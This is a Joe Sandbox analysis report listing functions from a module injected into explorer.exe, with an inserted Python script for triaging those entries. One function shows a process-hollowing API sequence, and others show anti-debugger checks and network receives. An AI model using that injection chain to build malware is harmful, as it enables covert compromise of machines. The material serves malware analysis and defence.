                                                  • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                  • API String ID: 667068680-295688737
                                                  • Opcode ID: 40f4a6d827ba6232ce68cf3bac88895ce5833e7b926e2d352a634f9d2aa61b2e
                                                  • Instruction ID: 539d9f47b2b7cec02eb1377aa30356c7759717164964a889d8449c4037191103
                                                  • Opcode Fuzzy Hash: 40f4a6d827ba6232ce68cf3bac88895ce5833e7b926e2d352a634f9d2aa61b2e
                                                  • Instruction Fuzzy Hash: 8E61A9729A6360FFCF00BFB5B80DA5E3AA8BE09652314C81AF911D254DD7F462908F95
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0320809D
                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 032080FB
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 03208114
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 03208129
                                                  • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 03208149
                                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0320818B
                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 032081A8
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 03208261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                                                  • String ID: $VUUU$invalid stoi argument
                                                  • API String ID: 3796053839-3954507777
                                                  • Opcode ID: b33ae9abb80c62f23786bdff205f1b7ae8196a3eaceacc7b25d548e3680472eb
                                                  • Instruction ID: bdd7d3d91fb87be20e6de46c389dc09da44d9a6da242c6bcecf94196624ccd3b
                                                  • Opcode Fuzzy Hash: b33ae9abb80c62f23786bdff205f1b7ae8196a3eaceacc7b25d548e3680472eb
                                                  • Instruction Fuzzy Hash: AF417F71654341BFD720DB61EC09FA6BBE8BF88B10F004419BA84E61D0D7B0A594CB96
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • GetACP.KERNEL32(?,?,?,?,?,?,032351D7,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 032421E7
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,032351D7,?,?,?,00000055,?,-00000050,?,?), ref: 03242212
                                                  • _wcschr.LIBVCRUNTIME ref: 032422A6
                                                  • _wcschr.LIBVCRUNTIME ref: 032422B4
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 03242375
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                  • String ID: utf8
                                                  • API String ID: 4147378913-905460609
                                                  • Opcode ID: 4ebf26292a8a1fa0574f198958b0dab56d931511359d9df50151a4240f50ab91
                                                  • Instruction ID: dba757658a9c66f916d837de6903a4e410a21bfdcc539616f551a0f2ec65d700
                                                  • Opcode Fuzzy Hash: 4ebf26292a8a1fa0574f198958b0dab56d931511359d9df50151a4240f50ab91
                                                  • Instruction Fuzzy Hash: FE71D975620306EAD72DEB36DC45BAAB7ACEF45700F144866F505DB181FBB0E9C08761
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: d956e1cd944ccf22fc2939797c9196d0e9c2c1eb7d04dcc7bf149c219e046ddc
                                                  • Instruction ID: aadb54dc6a05f7bf1a253b228c3dc59cc3144864e826fa8794a7e1722e1ed574
                                                  • Opcode Fuzzy Hash: d956e1cd944ccf22fc2939797c9196d0e9c2c1eb7d04dcc7bf149c219e046ddc
                                                  • Instruction Fuzzy Hash: E3D26C71E282298FDB69DE29DD407EAB7B9EB45304F1841EAD44DE7240E774AEC08F41
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,03242BD0,00000002,00000000,?,?,?,03242BD0,?,00000000), ref: 0324294B
                                                  • GetLocaleInfoW.KERNEL32(?,20001004,03242BD0,00000002,00000000,?,?,?,03242BD0,?,00000000), ref: 03242974
                                                  • GetACP.KERNEL32(?,?,03242BD0,?,00000000), ref: 03242989
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 990a80fe0c9971280584d2df0816587c79cfe8cf73f7b9b9a06d8f4ccbae10d3
                                                  • Instruction ID: bdfd870272431d08598e2e92346f61806580c6113cd216749edfde04a1570d3e
                                                  • Opcode Fuzzy Hash: 990a80fe0c9971280584d2df0816587c79cfe8cf73f7b9b9a06d8f4ccbae10d3
                                                  • Instruction Fuzzy Hash: 9321C932A30306D6DB3CCF16D504B9BF3AAAB44E54B6E88A4F906D7104E772D9C1C750
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E32
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E68
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 03242B93
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 03242BDC
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 03242BEB
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 03242C33
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 03242C52
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 949163717-0
                                                  • Opcode ID: 4ba6dd9f771bc8b90a41c03b183a3f48e512e75237b8d2691bac510986fa39c0
                                                  • Instruction ID: 70fa974b53d84bbb341b30a6b4ad928f015601cc457f767d51ceddc22b56d3c5
                                                  • Opcode Fuzzy Hash: 4ba6dd9f771bc8b90a41c03b183a3f48e512e75237b8d2691bac510986fa39c0
                                                  • Instruction Fuzzy Hash: E8516271920316EEDB15EFA6DC44BBEB7B8EF44700F094865F911EB140EBB09A84CB61
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0322A4B1
                                                  • IsDebuggerPresent.KERNEL32 ref: 0322A57D
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0322A59D
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0322A5A7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: d0a69b3d0b4f935a70489a3e6dd4553e65a505cef56e02fb96f7b7c302601018
                                                  • Instruction ID: 6d4c7eacf08de9aa6f53f5be1d9be67b5f1e8e36f8a2cde1898a1ed3646399b3
                                                  • Opcode Fuzzy Hash: d0a69b3d0b4f935a70489a3e6dd4553e65a505cef56e02fb96f7b7c302601018
                                                  • Instruction Fuzzy Hash: A8310975D113299BDF10EFA4D989BCDBBB8AF08704F10419AE40DAB240EB719B848F45
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E32
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E68
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0324258D
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 032425D7
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0324269D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale$ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 3140898709-0
                                                  • Opcode ID: a52e1c18a030e66389b6488386b7165f8401bc92a4955b877291cae89751846b
                                                  • Instruction ID: 6bc185d316fcb4f1574a308851fa4009665a6dbcc7021e2629201e3a0db10b42
                                                  • Opcode Fuzzy Hash: a52e1c18a030e66389b6488386b7165f8401bc92a4955b877291cae89751846b
                                                  • Instruction Fuzzy Hash: AB619D71920317DBDB2CDF26DD81BAAB7A8EF04710F1845A9E905CA284E7B4E9D1CB50
                                                  APIs
                                                  • recv.WS2_32(?,?,00000004,00000000), ref: 0321282B
                                                  • recv.WS2_32(?,?,00000008,00000000), ref: 03212860
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  • Opcode ID: c0dc2f700e9a9836583710eeb03741a3bd492173d8c399004dca1839f3921d41
                                                  • Instruction ID: 81f1e846d6e50797a0ed4e114f6a06a923d172e8fcf5fa180c61ec2d17377244
                                                  • Opcode Fuzzy Hash: c0dc2f700e9a9836583710eeb03741a3bd492173d8c399004dca1839f3921d41
                                                  • Instruction Fuzzy Hash: BC31E4719102189FD720DB68ED85BABBBECEB0C724F144625F524E72C1DB74A8958BA0
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0322EF65
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0322EF6F
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0322EF7C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: e42c396d35bb3c5d293f48773053dede9a835ec8a619d7a37a32b65427d6e520
                                                  • Instruction ID: 71690d1c354a82c42ad9f52522718963c7e47218a1d95f5378f84095dbd05816
                                                  • Opcode Fuzzy Hash: e42c396d35bb3c5d293f48773053dede9a835ec8a619d7a37a32b65427d6e520
                                                  • Instruction Fuzzy Hash: 0131B374911329ABCF21DF68DC8879DBBB8BF18710F5041DAE40CA6250E7709BC18F45
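The function above is the one behind the report's "Contains functionality to check if a debugger is running (IsDebuggerPresent)" signature: its API ID pairs UnhandledExceptionFilter with DebuggerPresent even though only the UnhandledExceptionFilter call carries a reference. Read together with the entries that follow (RaiseException with C000000D, IsProcessorFeaturePresent(0000000A), the GetLocaleInfoW and EnumSystemLocalesW family), this is what the MSVC C runtime's startup and error-reporting paths look like once statically linked into the module mapped at 03200000 inside explorer.exe, so a triager wants to separate runtime code from the routines that are actually the payload's own before reading the rest of the listing. The Python script below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses entries in exactly this layout, reconstructs the API-ID token naming (normalize() is my approximation of Joe Sandbox's scheme, inferred from the names on this page), flags debugger-check APIs and labels the runtime patterns with a heuristic table of my own. SAMPLE is constructed from three entries on this page.

```python
"""Triage Joe Sandbox per-function metadata; added example, not Joe Sandbox code."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed input: three entries copied in the report's own layout.
SAMPLE = """\
APIs
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0322EF7C
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• API String ID: 3906539128-0
• Instruction Fuzzy Hash: 0131B374911329ABCF21DF68DC8879DBBB8BF18710F5041DAE40CA6250E7709BC18F45
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008), ref: 0323CC0A
Similarity
• API ID: ExceptionRaise
• Instruction Fuzzy Hash: EFB16FB1620619CFD715CF28C486B65BBE1FF06364F198658E89ADF2A1C735E982CB40
APIs
  • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?), ref: 03236DD5
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 032427E0
Similarity
• API ID: ErrorLast_free$InfoLocale
• Instruction Fuzzy Hash: 4B218672520316EBDB2CDE16ED81E7E77ACEF45710F14447AF901DA140EBB4D980CA60
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*?)\s*$")
# Debugger-check APIs in API-ID form (see normalize): IsDebuggerPresent, CheckRemoteDebuggerPresent, OutputDebugString
ANTI_DEBUG = {"DebuggerPresent", "CheckDebuggerPresentRemote", "DebugOutputString"}
ApiCall = namedtuple("ApiCall", "name module args ref via_subcall")

def normalize(api_name):
    """Approximate Joe Sandbox's API-ID naming as inferred from this report (assumption):
    drop Get/Set/Is prefixes and A/W suffixes, then sort the CamelCase words."""
    if api_name.startswith("_"):        # CRT internals such as _free stay verbatim
        return api_name
    words = re.findall(r"[A-Z][a-z0-9]*", api_name)
    if words and words[-1] in ("A", "W"):
        words.pop()
    if words and words[0] in ("Get", "Set", "Is"):
        words.pop(0)
    return "".join(sorted(words))

@dataclass
class Function:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def tokens(self):
        # Listed calls plus the API ID line, which can name checks that have no call line of their own.
        own = {normalize(c.name) for c in self.apis}
        return own | {t for t in self.fields.get("API ID", "").split("$") if t}

def parse(text):
    funcs, cur = [], Function()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"] or ""))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":   # last line of every entry
                funcs.append(cur)
                cur = Function()
    return funcs

def _calls(f, name, first_arg):
    return any(c.name == name and c.args[:1] == [first_arg] for c in f.apis)

# This example's own heuristics: patterns the MSVC C runtime emits in every
# statically linked binary, so they say nothing about the sample's own logic.
CRT_NOISE = [
    (lambda f: {"ExceptionFilterUnhandled", "DebuggerPresent"} <= f.tokens(),
     "CRT fatal-error path: UnhandledExceptionFilter + IsDebuggerPresent"),
    (lambda f: _calls(f, "RaiseException", "C000000D"),
     "CRT _invalid_parameter: RaiseException(STATUS_INVALID_PARAMETER)"),
    (lambda f: _calls(f, "IsProcessorFeaturePresent", "0000000A"),
     "CRT CPU probe: IsProcessorFeaturePresent(PF_XMMI64_INSTRUCTIONS_AVAILABLE)"),
    (lambda f: bool(f.tokens() & {"InfoLocale", "EnumLocalesSystem"}),
     "CRT locale initialisation: GetLocaleInfoW / EnumSystemLocalesW"),
]

def triage(funcs):
    """One dict per function: direct calls, anti-debug hits and library-noise labels."""
    out = []
    for f in funcs:
        direct = [c for c in f.apis if not c.via_subcall]
        out.append({"ref": direct[0].ref if direct else None,
                    "apis": [c.name for c in direct],
                    "anti_debug": sorted(f.tokens() & ANTI_DEBUG),
                    "library_noise": [why for test, why in CRT_NOISE if test(f)]})
    return out
```

Run it over the whole function list of the 03200000 module and everything that comes back with a library-noise label can be set aside; entries that carry an anti-debug token with no library label, or no label at all, are where hand analysis of the injected module should start. The table is deliberately narrow: an unlabeled function is merely unexplained, not shown to be malicious, and an extra CRT pattern is added by appending one more predicate rather than by loosening the existing ones.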
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 268a6a1f54e59719a2cef1b62622025145d8953db70c9ce89e593b3ab586b678
                                                  • Instruction ID: 26e398d3913dd8296f740d6504e613fc0b1e12c8bc4f14b88e0e66e0c48c008a
                                                  • Opcode Fuzzy Hash: 268a6a1f54e59719a2cef1b62622025145d8953db70c9ce89e593b3ab586b678
                                                  • Instruction Fuzzy Hash: 99F13EB5E102199FDF14CFA8C8806AEFBB5FF49314F198269D919AB344D731AA41CB90
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0323C9D8,?,?,00000008,?,?,032464A0,00000000), ref: 0323CC0A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 53437324f71bca9b4bc98fe44daca6186b84ad4d7fc5aa2645aea49a281bb2de
                                                  • Instruction ID: 50f92218ec488db029d507be38e195497a80d421eeea2c1e3275a6204f001f8e
                                                  • Opcode Fuzzy Hash: 53437324f71bca9b4bc98fe44daca6186b84ad4d7fc5aa2645aea49a281bb2de
                                                  • Instruction Fuzzy Hash: EFB16FB1620619CFD715CF28C486B65BBE1FF06364F198658E89ADF2A1C735E982CB40
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0322A6A5
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-0
                                                  • Opcode ID: 45aef4839921e8f0b17ae83d2d45f9e574ae66c15d3f4cd500dd24a2e7c28d12
                                                  • Instruction ID: 698295c60c89f067eacf2dfb125d51dd59709100c925edffc59d61e42998e4b9
                                                  • Opcode Fuzzy Hash: 45aef4839921e8f0b17ae83d2d45f9e574ae66c15d3f4cd500dd24a2e7c28d12
                                                  • Instruction Fuzzy Hash: 2D518CB1D106269BDB15CF59E8897AEBBF1FB48310F18C46AC805EB785D7749980CFA0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                   • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmp
                                                   • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae41b9410bf412790e2c7b4608d6f20600b185a4399bbd743c5455751ec880d8
